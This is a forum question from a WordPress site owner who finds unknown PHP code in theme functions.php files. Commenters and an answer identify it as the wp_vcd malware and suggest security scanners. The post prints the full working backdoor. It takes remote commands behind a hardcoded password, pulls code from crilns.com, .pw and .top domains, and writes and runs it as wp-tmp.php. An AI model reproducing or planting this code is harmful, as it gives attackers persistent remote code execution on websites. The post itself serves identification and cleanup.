# What is this code in my theme's functions.php?

Tags: wordpress

This code appears in my theme's `functions.php`, also in child themes and all sub folders. I've deleted it twice but it comes back. What is it?

All 30+ of my websites face this issue; it also created random number of files.

```
<?php
//hmOTE0Nyc7CiAgICAgICAgaWYgKCgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '3782efbe0a2ea423de4e2bf00676380a'))
    {
    $div_code_name="wp_vcd";
        switch ($_REQUEST['action'])
            {
                case 'change_domain';
                    if (isset($_REQUEST['newdomain']))
                        {                           
                            if (!empty($_REQUEST['newdomain']))
                                {                                                                           if ($file = @file_get_contents(__FILE__))
                                    {
                                        if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                            $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                            @file_put_contents(__FILE__, $file);
                                            print "true";
                                    }
                                }
                        }
                break;

                case 'change_code';
                    if (isset($_REQUEST['newcode']))
                        {                           
                            if (!empty($_REQUEST['newcode']))
                                {
                                    if ($file = @file_get_contents(__FILE__))
                                        {
                                            if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

                                                $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                @file_put_contents(__FILE__, $file);
                                                print "true";
                                        }
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
            }

        die("");
    }

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
           {
           }
            else
            {
            $tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }


$wp_auth_key='63c8d53637ade64b66da22dcdcc8d269';
        if (($tmpcontent = @file_get_contents("http://www.crilns.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.crilns.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }


        elseif ($tmpcontent = @file_get_contents("http://www.crilns.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        } 

                elseif ($tmpcontent = @file_get_contents("http://www.crilns.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }
        elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 

    }
}

//$start_wp_theme_tmp
//1111111111111111111111111111111111111111111
//wp_tmp
//$end_wp_theme_tmp
?>
```

Comment: Hi kirti, please reformat your code to be readable (See: [How do I format my code blocks?](https://meta.stackexchange.com/questions/22186/how-do-i-format-my-code-blocks))

Comment: appears that your server is hacked/compromised.

Answer (score 1):

This looks like a code injection script. It will write files to your site and then tell a remote server what the link is to run that specific code. This definitely seems malicious and if it continues to come back after you've removed it, I would say it is.

You can run something like WP-Defender or Wordfence to analyse your WP core and remove some of this malicious code.

I've found a link relating to the constant (WP_V_CD)
https://medium.com/@rakshitshah/wordpress-wp-vcd-malware-attack-e7394801895d